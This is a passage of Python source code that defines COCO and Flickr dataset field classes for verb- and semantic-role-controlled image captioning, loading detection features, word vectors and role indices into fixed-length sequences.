self.img_shapes = json.load(fp)
with open(verb_idx_path, 'r') as fp:
self.verb_2_idx = json.load(fp)
with open(vocab_path, 'r') as f:
vocab_list = json.load(f)
self.vocab_2_idx = {}
for idx, vocab in enumerate(vocab_list):
self.vocab_2_idx[vocab] = idx
# match verb_idx to vocab_idx
with open(vlem_2_v_og_path) as f:
self.vlem_2_verb = json.load(f)
with open(cls_seq_path) as f:
self.img_cap_v_2_class = json.load(f)
self.sr_2_idx = {'ARG0': 1, 'ARG1': 2, 'ARG2': 3, 'ARG3': 4, 'ARG4': 5, 'ARG5': 6, 'LOC': 7, 'DIR': 8, 'GOL': 9,
'MNR': 10, 'TMP': 11, 'EXT': 12, 'REC': 13, 'PRD': 14, 'PRP': 15, 'CAU': 16, 'DIS': 17, 'ADV': 18,
'ADJ': 19, 'MOD': 20, 'NEG': 21, 'LVB': 22, 'PNC': 23, 'COM': 24, 'V': 25} # END is for predict END of the output
super(COCODetSetField_Verb, self).__init__(None, postprocessing)
def preprocess(self, x, rand=True):
image = x[0][0]
caption = x[0][1]
id_image = int(image.split('/')[-1].split('_')[-1].split('.')[0])
try:
f = h5py.File(self.detections_path, 'r')
det_cls_probs = f['%s_cls_prob' % id_image][()]
det_features = f['%s_features' % id_image][()]
det_boxes = f['%s_boxes' % id_image][()]
except KeyError:
warnings.warn('Could not find detections for %d' % id_image)
det_cls_probs = np.random.rand(10, 2048)
det_features = np.random.rand(10, 2048)
det_boxes = np.random.rand(10, 4)
# get the det region info.
v_2_class = self.img_cap_v_2_class[str(id_image)][caption]
classes_seq = []
loc_2_verb = {}
loc_2_sr = {}
loc = 0
cap_2_verb = []
vlem_2_verb = self.vlem_2_verb[str(id_image)][caption]
for verb in v_2_class:
for sr in v_2_class[verb]:
for class_idx in v_2_class[verb][sr]:
if verb not in cap_2_verb:
cap_2_verb.append(verb)
classes_seq.append(class_idx) # the class idx (1600分类中的某一类)
control_verb = np.zeros(8)
for j, verb in enumerate(cap_2_verb):
control_verb[j] = self.verb_2_idx[verb] + 1 # 0代表没有verb
# append the cls_seq with "verb" in the beginning
cls_seq = []
for verb in cap_2_verb:
cls_seq.append('verb')
loc_2_verb.setdefault(loc, []).append(verb)
loc_2_sr.setdefault(loc, []).append('V')
loc += 1
cls_seq += [self.classes[class_idx] for class_idx in classes_seq]
for verb in v_2_class:
for sr in v_2_class[verb]:
for class_idx in v_2_class[verb][sr]:
loc_2_verb.setdefault(loc, []).append(verb)
loc_2_sr.setdefault(loc, []).append(sr)
loc += 1
selected_classes = [self.classes[np.argmax(det_cls_probs[i][1:]) + 1] for i in range(len(det_cls_probs))] # class从1开始,0可能表示没有关系
width, height = self.img_shapes[str(id_image)]
# pooled_feat
pooled_feat = np.mean(det_features, axis=0)
det_sequences_visual_all = np.zeros((self.fix_length, self.max_detections, det_features.shape[-1]))
det_sequences_visual = np.zeros((self.fix_length, det_features.shape[-1]))
det_sequences_word = np.zeros((self.fix_length, 300))
det_sequences_position = np.zeros((self.fix_length, 4))
det_sequences_sr = np.zeros((self.fix_length, 8))
det_sequences_verb = np.zeros((self.fix_length, 8))
idx_list = np.zeros((self.fix_length, 1))
idx_list[idx_list==0] = -1
cls_seq = cls_seq[:self.fix_length] # 只保留前10个
# 不是verb的位置为0,是verb的位置为verb的index
verb_list = np.zeros((self.fix_length, 1))
verb_list[verb_list==0] = -1
# 随机排序
idx_rank = [x for x in range(self.fix_length)]
rank_use = list(zip(cls_seq, idx_rank))
random.shuffle(rank_use)
cls_seq, idx_list_ = zip(*rank_use)
idx_list_ = np.array(idx_list_)
idx_list[:len(idx_list_), :] = idx_list_[:, np.newaxis]
for j, cls in enumerate(cls_seq):
if cls != 'verb':
cls_w = cls.split(',')[0].split(' ')[-1] # 当前class,为啥这么处理?
if cls_w in self.vectors:
det_sequences_word[j] = self.vectors[cls_w]
seed_detections = [i for i, c in enumerate(selected_classes) if c == cls] # 从detections里面找到class是选中class的detections序号
if seed_detections != []:
det_ids = np.unique(seed_detections)
else:
det_ids = np.array([]).astype(np.int64)
if len(det_ids) == 0:
det_ids = [1]
print(caption)
det_sequences_visual_all[j, :len(det_ids)] = np.take(det_features, det_ids, axis=0)[:self.max_detections] # 当前class所有region的feature
det_sequences_visual[j] = det_features[det_ids[0]] # 当前class第一个region的feature
bbox = det_boxes[det_ids[0]] # 当前class第一个region的框 (x1, y1, x2, y2)
det_sequences_position[j, 0] = (bbox[2] - bbox[0] / 2) / width # 中心横坐标
det_sequences_position[j, 1] = (bbox[3] - bbox[1] / 2) / height # 中心纵坐标
det_sequences_position[j, 2] = (bbox[2] - bbox[0]) / width # 宽
det_sequences_position[j, 3] = (bbox[3] - bbox[1]) / height # 长
else:
det_sequences_visual_all[j, 0] = pooled_feat
# 后面这串是verb_idx
if loc_2_verb[int(idx_list[j][0])] != []:
if self.gt_verb is False:
verb_list[j, :] = self.verb_2_idx[loc_2_verb[int(idx_list[j][0])][0]] + 1
else:
for v_lem, verb_og in vlem_2_verb:
if v_lem == loc_2_verb[int(idx_list[j][0])][0]:
if verb_og in self.vocab_2_idx:
verb_list[j, :] = self.vocab_2_idx[verb_og]
else:
verb_list[j, :] = 0
break
for k, sr in enumerate(loc_2_sr[int(idx_list[j][0])]):
if k >= 8:
continue
det_sequences_sr[j, k] = self.sr_2_idx[sr.split('-')[-1]] # 0代表pad
det_sequences_verb[j, k] = self.verb_2_idx[loc_2_verb[int(idx_list[j][0])][k]] + 1 # 0代表pad
return det_sequences_word.astype(np.float32), det_sequences_visual.astype(np.float32), \
det_sequences_position.astype(np.float32), det_sequences_visual_all.astype(np.float32), \
det_sequences_verb.astype(np.float32), det_sequences_sr.astype(np.float32), \
control_verb.astype(np.float32), idx_list, verb_list
# Flickr
class FlickrDetectionField(RawField):
def __init__(self, preprocessing=None, postprocessing=None, detections_path=None, diverse=False):
self.max_detections = 100
self.detections_path = detections_path
self.diverse = diverse
super(FlickrDetectionField, self).__init__(preprocessing, postprocessing)
def preprocess(self, x, avoid_precomp=False):
image_id = int(x.split('/')[-1].split('.')[0])
try:
precomp_data = h5py.File(self.detections_path, 'r')['%d_features' % image_id][()]
except KeyError:
warnings.warn('Could not find detections for %d' % image_id)
precomp_data = np.random.rand(10, 2048)
delta = self.max_detections - precomp_data.shape[0]
if delta > 0:
precomp_data = np.concatenate([precomp_data, np.zeros((delta, precomp_data.shape[1]))], axis=0)
elif delta < 0:
precomp_data = precomp_data[:self.max_detections]
if self.diverse:
return precomp_data.astype(np.float32), image_id
return precomp_data.astype(np.float32)
# Flickr detection field
class FlickrControlSetField(RawField):
def __init__(self, postprocessing=None, idx_vs_path=None, cap_verb_path=None, cap_classes_path=None,
verb_idx_path=None, detections_path=None, classes_path=None, img_shapes_path=None,
precomp_glove_path=None, fix_length=20, max_detections=20, visual=True):
self.fix_length = fix_length
self.detections_path = detections_path
self.max_detections = max_detections
self.visual = visual
self.classes = ['__background__']
with open(classes_path, 'r') as f:
for object in f.readlines():
self.classes.append(object.split(',')[0].lower().strip())
with open(precomp_glove_path, 'rb') as fp:
self.vectors = pkl.load(fp)
with open(img_shapes_path, 'r') as fp:
self.img_shapes = json.load(fp)
with open(verb_idx_path) as f:
self.flickr_verb_idx = json.load(f)
with open(idx_vs_path) as f:
self.idx_2_vs = json.load(f)
with open(cap_verb_path) as f:
self.cap_2_verb = json.load(f)
with open(cap_classes_path) as f:
self.cap_2_classes = json.load(f)
self.sr_2_idx = {'ARG0': 1, 'ARG1': 2, 'ARG2': 3, 'ARG3': 4, 'ARG4': 5, 'ARG5': 6, 'LOC': 7, 'DIR': 8, 'GOL': 9,
'MNR': 10, 'TMP': 11, 'EXT': 12, 'REC': 13, 'PRD': 14, 'PRP': 15, 'CAU': 16, 'DIS': 17, 'ADV': 18,
'ADJ': 19, 'MOD': 20, 'NEG': 21, 'LVB': 22, 'PNC': 23, 'COM': 24, 'V': 25}
super(FlickrControlSetField, self).__init__(None, postprocessing)
@staticmethod
def _bb_intersection_over_union(boxA, boxB):
xA = max(boxA[0], boxB[0])
yA = max(boxA[1], boxB[1])
xB = min(boxA[2], boxB[2])
yB = min(boxA[3], boxB[3])
interArea = max(0, xB - xA + 1) * max(0, yB - yA + 1)
boxAArea = (boxA[2] - boxA[0] + 1) * (boxA[3] - boxA[1] + 1)
boxBArea = (boxB[2] - boxB[0] + 1) * (boxB[3] - boxB[1] + 1)
iou = interArea / (boxAArea + boxBArea - interArea)
return iou
def preprocess(self, x):
image = x[0][0]
caption = x[0][1]
gt_bboxes = x[1]
id_image = image.split('/')[-1].split('.')[0]
if self.visual:
try:
f = h5py.File(self.detections_path, 'r')
det_cls_probs = f['%s_cls_prob' % id_image][()]
det_features = f['%s_features' % id_image][()]
det_bboxes = f['%s_boxes' % id_image][()]
except KeyError:
warnings.warn('Could not find detections for %d' % id_image)
det_cls_probs = np.random.rand(10, 2048)
det_features = np.random.rand(10, 2048)
det_bboxes = np.random.rand(10, 4)
idx_2_verb = self.idx_2_vs[id_image][caption]['verb'] # verb&num
idx_2_sr = self.idx_2_vs[id_image][caption]['sr'] # sr_idx
cap_2_verb = self.cap_2_verb[id_image][caption] # verb
cls_seq = self.cap_2_classes[id_image][caption]
cls_seq = [x-1 for x in cls_seq] # verb由-1变为了-2
if self.visual:
selected_classes = [self.classes[np.argmax(det_cls_probs[i][1:]) + 1] for i in range(len(det_cls_probs))]
width, height = self.img_shapes[str(id_image)]
# visual feature
pooled_feat = np.mean(det_features, axis=0)
det_sequences_visual_all = np.zeros((self.fix_length, self.max_detections, det_features.shape[-1]))
det_sequences_visual = np.zeros((self.fix_length, det_features.shape[-1]))
det_sequences_word = np.zeros((self.fix_length, 300))
det_sequences_position = np.zeros((self.fix_length, 4))
# semantic role feature
det_sequences_sr = np.zeros((self.fix_length, 8))
det_sequences_verb = np.zeros((self.fix_length, 8))
gt_det_sequences_sr = np.zeros((self.fix_length, 8))
gt_det_sequences_verb = np.zeros((self.fix_length, 8))
control_verb = np.zeros(8)
for j, verb in enumerate(cap_2_verb):
if j >= 8:
continue
control_verb[j] = self.flickr_verb_idx[verb.split('_')[0]] + 1 \
+ 10000 * int(verb.split('_')[-1]) # 0代表没有verb
# 不是verb的位置为0,是verb的位置为verb的index
idx_list = np.zeros((self.fix_length, 1))
idx_list[idx_list==0] = -1
cls_seq = cls_seq[:self.fix_length] # 只保留前10个
for j, cls_ in enumerate(cls_seq):
for k, sr in enumerate(idx_2_sr[j]):
if idx_2_verb[j][k] in cap_2_verb:
gt_det_sequences_sr[j, k] = sr # 0代表pad
gt_det_sequences_verb[j, k] = self.flickr_verb_idx[idx_2_verb[j][k].split('_')[0]] + 1 \
+ 10000 * int(idx_2_verb[j][k].split('_')[-1]) # 0代表没有verb
# 随机排序
idx_rank = [x for x in range(self.fix_length)]
rank_use = list(zip(cls_seq, idx_rank))
random.shuffle(rank_use)
cls_seq, idx_list_ = zip(*rank_use)
idx_list_ = np.array(idx_list_)
idx_list[:len(idx_list_), :] = idx_list_[:, np.newaxis]
for j, cls in enumerate(cls_seq):
if self.visual:
id_boxes = []
for k, bbox in enumerate(gt_bboxes[cls]):
id_bbox = -1
iou_max = 0
for ii, det_bbox in enumerate(det_bboxes):
iou = self._bb_intersection_over_union(bbox, det_bbox)
if iou_max < iou:
id_bbox = ii
iou_max = iou
id_boxes.append(id_bbox)
id_boxes.sort()
cls_w = selected_classes[id_boxes[0]].split(',')[0].split(' ')[-1]
if cls_w in self.vectors:
det_sequences_word[j] = self.vectors[cls_w]
det_sequences_visual_all[j, :len(id_boxes)] = np.take(det_features, id_boxes, axis=0)[:self.max_detections]
det_sequences_visual[j] = det_features[id_boxes[0]]
bbox = det_bboxes[id_boxes[0]]
det_sequences_position[j, 0] = (bbox[2] - bbox[0] / 2) / width
det_sequences_position[j, 1] = (bbox[3] - bbox[1] / 2) / height
det_sequences_position[j, 2] = (bbox[2] - bbox[0]) / width
det_sequences_position[j, 3] = (bbox[3] - bbox[1]) / height
for k, sr in enumerate(idx_2_sr[int(idx_list[j][0])]):
if idx_2_verb[int(idx_list[j][0])][k] in cap_2_verb:
det_sequences_sr[j, k] = sr
det_sequences_verb[j, k] = self.flickr_verb_idx[idx_2_verb[int(idx_list[j][0])][k].split('_')[0]] + 1 \
+ 10000 * int(idx_2_verb[int(idx_list[j][0])][k].split('_')[-1])
if self.visual:
return det_sequences_word.astype(np.float32), det_sequences_visual.astype(np.float32), \
det_sequences_position.astype(np.float32), det_sequences_visual_all.astype(np.float32), \
det_sequences_verb.astype(np.float32), det_sequences_sr.astype(np.float32), control_verb.astype(np.float32), \
gt_det_sequences_verb.astype(np.float32), gt_det_sequences_sr.astype(np.float32), idx_list
else:
return det_sequences_verb.astype(np.float32), det_sequences_sr.astype(np.float32), control_verb.astype(np.float32), \
gt_det_sequences_verb.astype(np.float32), gt_det_sequences_sr.astype(np.float32), idx_list
class FlickrDetSetField(RawField):
def __init__(self, postprocessing=None, verb_idx_path=None, verb_vob_path=None, idbox_seq_path=None,
detections_path=None, classes_path=None, img_shapes_path=None, precomp_glove_path=None,
fix_length=20, max_detections=20, visual=True):
self.fix_length = fix_length
self.detections_path = detections_path
self.max_detections = max_detections
self.visual = visual
self.classes = ['__background__']
with open(classes_path, 'r') as f:
for object in f.readlines():
self.classes.append(object.split(',')[0].lower().strip())
with open(precomp_glove_path, 'rb') as fp:
self.vectors = pkl.load(fp)
with open(img_shapes_path, 'r') as fp:
self.img_shapes = json.load(fp)
with open(verb_idx_path) as f:
self.flickr_verb_idx = json.load(f)
with open(verb_vob_path) as f:
self.verb_2_vob = json.load(f)
with open(idbox_seq_path) as f:
self.img_cap_v_2_idbox = json.load(f)
self.sr_2_idx = {'ARG0': 1, 'ARG1': 2, 'ARG2': 3, 'ARG3': 4, 'ARG4': 5, 'ARG5': 6, 'LOC': 7, 'DIR': 8, 'GOL': 9,
'MNR': 10, 'TMP': 11, 'EXT': 12, 'REC': 13, 'PRD': 14, 'PRP': 15, 'CAU': 16, 'DIS': 17, 'ADV': 18,
'ADJ': 19, 'MOD': 20, 'NEG': 21, 'LVB': 22, 'PNC': 23, 'COM': 24, 'V': 25}
super(FlickrDetSetField, self).__init__(None, postprocessing)
def preprocess(self, x):
image = x[0][0]
caption = x[0][1]
gt_bboxes = x[1]
det_classes = x[2]
id_image = image.split('/')[-1].split('.')[0]
try:
f = h5py.File(self.detections_path, 'r')
det_cls_probs = f['%s_cls_prob' % id_image][()]
det_features = f['%s_features' % id_image][()]
det_bboxes = f['%s_boxes' % id_image][()]
except KeyError:
warnings.warn('Could not find detections for %d' % id_image)
det_cls_probs = np.random.rand(10, 2048)
det_features = np.random.rand(10, 2048)
det_bboxes = np.random.rand(10, 4)
v_2_class = self.img_cap_v_2_idbox[id_image][caption]
loc_2_verb = {}
loc_2_sr = {}
loc = 0
idbox_seq = {}
cap_2_verb = []
for verb in v_2_class:
for sr in v_2_class[verb]:
for id_box in v_2_class[verb][sr]:
if verb not in cap_2_verb:
cap_2_verb.append(verb)
if id_box not in idbox_seq:
idbox_seq[id_box] = loc
loc += 1
control_verb = np.zeros(8)
for j, verb in enumerate(cap_2_verb):
if j >= 8:
continue
control_verb[j] = self.flickr_verb_idx[verb.split('_')[0]] + 1 # 0代表没有verb
for verb in v_2_class:
for sr in v_2_class[verb]:
for id_box in v_2_class[verb][sr]:
loc_ = idbox_seq[id_box]
loc_2_verb.setdefault(loc_, []).append(verb)
loc_2_sr.setdefault(loc_, []).append(sr)
width, height = self.img_shapes[str(id_image)]
# visual feature
selected_classes = [self.classes[np.argmax(det_cls_probs[i][1:]) + 1] for i in range(len(det_cls_probs))]
det_sequences_visual_all = np.zeros((self.fix_length, self.max_detections, det_features.shape[-1]))
det_sequences_visual = np.zeros((self.fix_length, det_features.shape[-1]))
det_sequences_word = np.zeros((self.fix_length, 300))
det_sequences_position = np.zeros((self.fix_length, 4))
# semantic role feature
det_sequences_sr = np.zeros((self.fix_length, 8))
det_sequences_verb = np.zeros((self.fix_length, 8))
for j, idbox in enumerate(idbox_seq):
if j == 10: break
det_sequences_visual_all[j, 0] = det_features[idbox] # 当前class所有region的feature
det_sequences_visual[j] = det_features[idbox] # 当前class第一个region的feature
cls_w = selected_classes[idbox].split(',')[0].split(' ')[-1]
if cls_w in self.vectors:
det_sequences_word[j] = self.vectors[cls_w]
bbox = det_bboxes[idbox] # 当前class第一个region的框 (x1, y1, x2, y2)
det_sequences_position[j, 0] = (bbox[2] - bbox[0] / 2) / width # 中心横坐标
det_sequences_position[j, 1] = (bbox[3] - bbox[1] / 2) / height # 中心纵坐标
det_sequences_position[j, 2] = (bbox[2] - bbox[0]) / width # 宽
det_sequences_position[j, 3] = (bbox[3] - bbox[1]) / height # 长
for k, sr in enumerate(loc_2_sr[j]):
if k >= 8:
continue
det_sequences_sr[j, k] = sr # 0代表pad
det_sequences_verb[j, k] = self.flickr_verb_idx[loc_2_verb[j][k].split('_')[0]] + 1 # 0代表pad
return det_sequences_word.astype(np.float32), det_sequences_visual.astype(np.float32), \
det_sequences_position.astype(np.float32), det_sequences_visual_all.astype(np.float32), \
det_sequences_verb.astype(np.float32), det_sequences_sr.astype(np.float32), control_verb.astype(np.float32)
class FlickrControlSetField_Verb(RawField):
def __init__(self, postprocessing=None, idx_vs_path=None, cap_verb_path=None, cap_classes_path=None,
verb_idx_path=None, idx_v_og_path=None, vocab_list_path=None, detections_path=None,
classes_path=None, img_shapes_path=None, precomp_glove_path=None, fix_length=20,
max_detections=20, visual=True, gt_verb=False):
self.fix_length = fix_length
self.detections_path = detections_path
self.max_detections = max_detections
self.visual = visual
self.gt_verb = gt_verb
self.classes = ['__background__']
with open(classes_path, 'r') as f:
for object in f.readlines():
self.classes.append(object.split(',')[0].lower().strip())
with open(precomp_glove_path, 'rb') as fp:
self.vectors = pkl.load(fp)
with open(img_shapes_path, 'r') as fp:
self.img_shapes = json.load(fp)
with open(idx_vs_path) as f:
self.idx_2_vs = json.load(f)
with open(cap_verb_path) as f:
self.cap_2_verb = json.load(f)
with open(cap_classes_path) as f:
self.cap_2_classes = json.load(f)
with open(verb_idx_path) as f:
self.flickr_verb_idx = json.load(f)
with open(idx_v_og_path) as f:
self.idx_2_v_og = json.load(f)
with open(vocab_list_path) as f:
vocab_list = json.load(f)
self.vocab_2_idx = {}
for idx, vocab in enumerate(vocab_list):
self.vocab_2_idx[vocab] = idx
self.sr_2_idx = {'ARG0': 1, 'ARG1': 2, 'ARG2': 3, 'ARG3': 4, 'ARG4': 5, 'ARG5': 6, 'LOC': 7, 'DIR': 8, 'GOL': 9,
'MNR': 10, 'TMP': 11, 'EXT': 12, 'REC': 13, 'PRD': 14, 'PRP': 15, 'CAU': 16, 'DIS': 17, 'ADV': 18,
'ADJ': 19, 'MOD': 20, 'NEG': 21, 'LVB': 22, 'PNC': 23, 'COM': 24, 'V': 25}
super(FlickrControlSetField_Verb, self).__init__(None, postprocessing)
@staticmethod
def _bb_intersection_over_union(boxA, boxB):
xA = max(boxA[0], boxB[0])
yA = max(boxA[1], boxB[1])
xB = min(boxA[2], boxB[2])
yB = min(boxA[3], boxB[3])
interArea = max(0, xB - xA + 1) * max(0, yB - yA + 1)
boxAArea = (boxA[2] - boxA[0] + 1) * (boxA[3] - boxA[1] + 1)
boxBArea = (boxB[2] - boxB[0] + 1) * (boxB[3] - boxB[1] + 1)
iou = interArea / (boxAArea + boxBArea - interArea)
return iou
def preprocess(self, x):
image = x[0][0]
caption = x[0][1]
gt_bboxes = x[1]
id_image = image.split('/')[-1].split('.')[0]
if self.visual:
try:
f = h5py.File(self.detections_path, 'r')
det_cls_probs = f['%s_cls_prob' % id_image][()]
det_features = f['%s_features' % id_image][()]
det_bboxes = f['%s_boxes' % id_image][()]
except KeyError:
warnings.warn('Could not find detections for %d' % id_image)
det_cls_probs = np.random.rand(10, 2048)
det_features = np.random.rand(10, 2048)
det_bboxes = np.random.rand(10, 4)
idx_2_verb = self.idx_2_vs[id_image][caption]['verb'] # verb&num
idx_2_v_og = self.idx_2_v_og[id_image][caption]
idx_2_sr = self.idx_2_vs[id_image][caption]['sr'] # sr_idx
cap_2_verb = self.cap_2_verb[id_image][caption] # verb
cls_seq = self.cap_2_classes[id_image][caption]
cls_seq = [x-1 for x in cls_seq] # verb由-1变为了-2
if self.visual:
selected_classes = [self.classes[np.argmax(det_cls_probs[i][1:]) + 1] for i in range(len(det_cls_probs))]
width, height = self.img_shapes[str(id_image)]
# visual feature
pooled_feat = np.mean(det_features, axis=0)
det_sequences_visual_all = np.zeros((self.fix_length, self.max_detections, det_features.shape[-1]))
det_sequences_visual = np.zeros((self.fix_length, det_features.shape[-1]))
det_sequences_word = np.zeros((self.fix_length, 300))
det_sequences_position = np.zeros((self.fix_length, 4))
# semantic role feature
det_sequences_sr = np.zeros((self.fix_length, 8))
det_sequences_verb = np.zeros((self.fix_length, 8))
gt_det_sequences_sr = np.zeros((self.fix_length, 8))
gt_det_sequences_verb = np.zeros((self.fix_length, 8))
control_verb = np.zeros(8)
for j, verb in enumerate(cap_2_verb):
if j >= 8:
continue
control_verb[j] = self.flickr_verb_idx[verb.split('_')[0]] + 1 \
+ 10000 * int(verb.split('_')[-1]) # 0代表没有verb
# 不是verb的位置为0,是verb的位置为verb的index
verb_list = np.zeros((self.fix_length, 1))
verb_list[verb_list==0] = -1
verb_list_og = np.zeros((self.fix_length, 1))
verb_list_og[verb_list_og==0] = -1
idx_list = np.zeros((self.fix_length, 1))
idx_list[idx_list==0] = -1
cls_seq = cls_seq[:self.fix_length] # 只保留前10个
for j, cls_ in enumerate(cls_seq):
for k, sr in enumerate(idx_2_sr[j]):
if idx_2_verb[j][k] in cap_2_verb:
gt_det_sequences_sr[j, k] = sr # 0代表pad
gt_det_sequences_verb[j, k] = self.flickr_verb_idx[idx_2_verb[j][k].split('_')[0]] + 1 \
+ 10000 * int(idx_2_verb[j][k].split('_')[-1]) # 0代表没有verb
# 随机排序
idx_rank = [x for x in range(self.fix_length)]
rank_use = list(zip(cls_seq, idx_rank))
random.shuffle(rank_use)
cls_seq, idx_list_ = zip(*rank_use)
idx_list_ = np.array(idx_list_)
idx_list[:len(idx_list_), :] = idx_list_[:, np.newaxis]
for j, cls in enumerate(cls_seq):
if self.visual:
if cls >= 0:
iou_max_max = 0
only_box = -1
id_boxes = []
for k, bbox in enumerate(gt_bboxes[cls]):
id_bbox = -1
iou_max = 0
# 只在前56个里面找iou最大的
for ii, det_bbox in enumerate(det_bboxes):
iou = self._bb_intersection_over_union(bbox, det_bbox)
if iou_max < iou:
id_bbox = ii
iou_max = iou
if iou_max_max < iou_max:
only_box = id_bbox
iou_max_max = iou_max
id_boxes.append(id_bbox)
id_boxes.sort()
det_sequences_visual_all[j, 0] = det_features[only_box]
det_sequences_visual[j] = det_features[only_box]
bbox = det_bboxes[only_box]
det_sequences_position[j, 0] = (bbox[2] - bbox[0] / 2) / width
det_sequences_position[j, 1] = (bbox[3] - bbox[1] / 2) / height
det_sequences_position[j, 2] = (bbox[2] - bbox[0]) / width
det_sequences_position[j, 3] = (bbox[3] - bbox[1]) / height
else:
det_sequences_visual_all[j, 0] = pooled_feat
if idx_2_verb[int(idx_list[j][0])] != [] and idx_2_verb[int(idx_list[j][0])][0].split('_')[0] in self.flickr_verb_idx:
verb_list[j, :] = \
self.flickr_verb_idx[idx_2_verb[int(idx_list[j][0])][0].split('_')[0]] + 1
if idx_2_v_og[int(idx_list[j][0])][0] in self.vocab_2_idx:
verb_list_og[j, :] = \
self.vocab_2_idx[idx_2_v_og[int(idx_list[j][0])][0]]
else:
verb_list_og[j, :] = 0
for k, sr in enumerate(idx_2_sr[int(idx_list[j][0])]):
if idx_2_verb[int(idx_list[j][0])][k] in cap_2_verb:
det_sequences_sr[j, k] = sr
det_sequences_verb[j, k] = self.flickr_verb_idx[idx_2_verb[int(idx_list[j][0])][k].split('_')[0]] + 1 \
+ 10000 * int(idx_2_verb[int(idx_list[j][0])][k].split('_')[-1])
if self.gt_verb:
if self.visual:
return det_sequences_word.astype(np.float32), det_sequences_visual.astype(np.float32), \
det_sequences_position.astype(np.float32), det_sequences_visual_all.astype(np.float32), \
det_sequences_verb.astype(np.float32), det_sequences_sr.astype(np.float32), control_verb.astype(np.float32), \
gt_det_sequences_verb.astype(np.float32), gt_det_sequences_sr.astype(np.float32), idx_list, verb_list_og
else:
return det_sequences_verb.astype(np.float32), det_sequences_sr.astype(np.float32), control_verb.astype(np.float32), \
gt_det_sequences_verb.astype(np.float32), gt_det_sequences_sr.astype(np.float32), idx_list, verb_list_og
else:
if self.visual:
return det_sequences_word.astype(np.float32), det_sequences_visual.astype(np.float32), \
det_sequences_position.astype(np.float32), det_sequences_visual_all.astype(np.float32), \
det_sequences_verb.astype(np.float32), det_sequences_sr.astype(np.float32), control_verb.astype(np.float32), \
gt_det_sequences_verb.astype(np.float32), gt_det_sequences_sr.astype(np.float32), idx_list, verb_list
else:
return det_sequences_verb.astype(np.float32), det_sequences_sr.astype(np.float32), control_verb.astype(np.float32), \
gt_det_sequences_verb.astype(np.float32), gt_det_sequences_sr.astype(np.float32), idx_list, verb_list
class FlickrDetSetField_Verb(RawField):
def __init__(self, postprocessing=None, verb_idx_path=None, verb_vob_path=None, idbox_seq_path=None,
vocab_list_path=None, vlem_2_verb_og_path=None, detections_path=None, classes_path=None,
img_shapes_path=None, precomp_glove_path=None, fix_length=20, max_detections=20,
visual=True, gt_verb=False):
self.fix_length = fix_length
self.detections_path = detections_path
self.max_detections = max_detections
self.visual = visual
self.gt_verb = gt_verb
self.classes = ['__background__']
with open(classes_path, 'r') as f:
for object in f.readlines():
self.classes.append(object.split(',')[0].lower().strip())
with open(precomp_glove_path, 'rb') as fp:
self.vectors = pkl.load(fp)
with open(img_shapes_path, 'r') as fp:
self.img_shapes = json.load(fp)
with open(verb_idx_path) as f:
self.flickr_verb_idx = json.load(f)
with open(verb_vob_path) as f:
self.verb_2_vob = json.load(f)
with open(idbox_seq_path) as f:
self.img_cap_v_2_idbox = json.load(f)
with open(vocab_list_path) as f:
vocab_list = json.load(f)
self.vocab_2_idx = {}
for idx, vocab in enumerate(vocab_list):
self.vocab_2_idx[vocab] = idx
with open(vlem_2_verb_og_path) as f:
self.vlem_2_verb = json.load(f)
self.sr_2_idx = {'ARG0': 1, 'ARG1': 2, 'ARG2': 3, 'ARG3': 4, 'ARG4': 5, 'ARG5': 6, 'LOC': 7, 'DIR': 8, 'GOL': 9,
'MNR': 10, 'TMP': 11, 'EXT': 12, 'REC': 13, 'PRD': 14, 'PRP': 15, 'CAU': 16, 'DIS': 17, 'ADV': 18,
'ADJ': 19, 'MOD': 20, 'NEG': 21, 'LVB': 22, 'PNC': 23, 'COM': 24, 'V': 25}
super(FlickrDetSetField_Verb, self).__init__(None, postprocessing)
def preprocess(self, x):
image = x[0][0]
caption = x[0][1]
gt_bboxes = x[1]
id_image = image.split('/')[-1].split('.')[0]
try:
f = h5py.File(self.detections_path, 'r')
det_cls_probs = f['%s_cls_prob' % id_image][()]
det_features = f['%s_features' % id_image][()]
det_bboxes = f['%s_boxes' % id_image][()]
except KeyError:
warnings.warn('Could not find detections for %d' % id_image)
det_cls_probs = np.random.rand(10, 2048)
det_features = np.random.rand(10, 2048)
det_bboxes = np.random.rand(10, 4)
v_2_class = self.img_cap_v_2_idbox[id_image][caption]
vlem_2_verb = self.vlem_2_verb[id_image][caption]
loc_2_verb = {}
loc_2_sr = {}
loc = 0
idbox_seq = {}
cap_2_verb = []
for verb in v_2_class:
for sr in v_2_class[verb]:
for id_box in v_2_class[verb][sr]:
if verb not in cap_2_verb:
cap_2_verb.append(verb)
if id_box not in idbox_seq:
idbox_seq[id_box] = loc
loc += 1
control_verb = np.zeros(8)
for j, verb in enumerate(cap_2_verb):
if j >= 8:
continue
control_verb[j] = self.flickr_verb_idx[verb.split('_')[0]] + 1 # 0代表没有verb
for verb in v_2_class:
for sr in v_2_class[verb]:
for id_box in v_2_class[verb][sr]:
loc_ = idbox_seq[id_box]
loc_2_verb.setdefault(loc_, []).append(verb)
loc_2_sr.setdefault(loc_, []).append(sr)
# append the cls_seq with "verb" in the end
for verb in cap_2_verb:
idbox_seq[-1] = loc # -1代表没有或者verb
loc_2_verb.setdefault(loc, []).append(verb)
loc_2_sr.setdefault(loc, []).append(25)
loc += 1
width, height = self.img_shapes[str(id_image)]
# visual feature
pooled_feat = np.mean(det_features, axis=0)
selected_classes = [self.classes[np.argmax(det_cls_probs[i][1:]) + 1] for i in range(len(det_cls_probs))]
det_sequences_visual_all = np.zeros((self.fix_length, self.max_detections, det_features.shape[-1]))
det_sequences_visual = np.zeros((self.fix_length, det_features.shape[-1]))
det_sequences_word = np.zeros((self.fix_length, 300))
det_sequences_position = np.zeros((self.fix_length, 4))
# semantic role feature
det_sequences_sr = np.zeros((self.fix_length, 8))
det_sequences_verb = np.zeros((self.fix_length, 8))
# 不是verb的位置为0,是verb的位置为verb的index
verb_list = np.zeros((self.fix_length, 1))
verb_list[verb_list==0] = -1
for j, idbox in enumerate(idbox_seq):
if j == 10: break
if idbox >= 0:
det_sequences_visual_all[j, 0] = det_features[idbox] # 当前class所有region的feature
det_sequences_visual[j] = det_features[idbox] # 当前class第一个region的feature
cls_w = selected_classes[idbox].split(',')[0].split(' ')[-1]
if cls_w in self.vectors:
det_sequences_word[j] = self.vectors[cls_w]
bbox = det_bboxes[idbox] # 当前class第一个region的框 (x1, y1, x2, y2)
det_sequences_position[j, 0] = (bbox[2] - bbox[0] / 2) / width # 中心横坐标
det_sequences_position[j, 1] = (bbox[3] - bbox[1] / 2) / height # 中心纵坐标
det_sequences_position[j, 2] = (bbox[2] - bbox[0]) / width # 宽
